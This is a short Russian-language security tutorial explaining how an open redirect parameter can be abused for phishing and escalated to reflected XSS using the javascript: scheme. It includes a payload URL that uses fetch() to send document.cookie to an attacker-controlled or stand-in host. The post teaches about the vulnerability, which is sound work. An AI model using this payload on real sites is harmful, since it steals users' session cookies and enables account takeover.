May 28, 2022

Open Redirect. Повышаем переход на другой сайт до XSS

E7 | TEAM

Введение:

В этой статье мы разберем такую уязвимость как Open Redirect. В чем опасность и какой ущерб может быть приченен обычным направлением на другой сайт?

Open Redirect - возможность указать сайту куда перенаправить человека посетившего этот сайт, самый обычный контролируемый редирект.

Почему это считается риском? Человек с нехорошими намерениями может создать фишинговую страницу и дать жертве ссылку на оригинальный сайт с функцикй содержащей редирект на подставной веб-сайт. Но во многих случаях может получиться совершить XSS атаку вида Reflective.

Основное:

Представим себе простую функцию на сайте, регистрация с последующим перенаправлением на блог:

https://myblog.com/register?blogredirect=https://myblog.com/blog/2818

После регистрации нас перенаправит на https://myblog.com/blog/2818, но для этого параметра можно подставить любое другое значение, к примеру https://myblog.ru/register будет фишинговой страницей и юзер получив такую ссылку при регистрации отправиться на зловредный сайт который попросит повторить регистрацию, после чего атакующий получит данные от аккаунта жервы.

Но фишинг не так интересен как XSS, позволяющая украсть сессию пользователя, как можно поместить джаваскрипт в URL для редиректа? Это можно сделать с помощью протокола javascript:

Теперь наш пейлоад выглядит так: https://myblog.com/register?blogredirect=javascript:fetch("https://myblog.ru"+document.cookie)

javascript:fetch("https://example.com/"+document.cookie) 

Данный эксплоит заставит браузер передать куки на сторонний сайт атакующего, что не требует сторонних действий от жертвы.

Вывод:

Хоть с первого взгляда и может показаться, что редирект на сайте не является риском, это совсем не так. Как мы убедились в статье, этому можно найти как минимум два применения со стороны атакующего!

Внимание! Вся информация строго в ознакомительно-познавательных целях. Автор данной статьи, а также ресурс на котором он размещает данную статью, не несут ответственности за любые последствия от ее прочтения, а также за ваше плохое самочувствие, детей - двоечников и долги по ипотеке.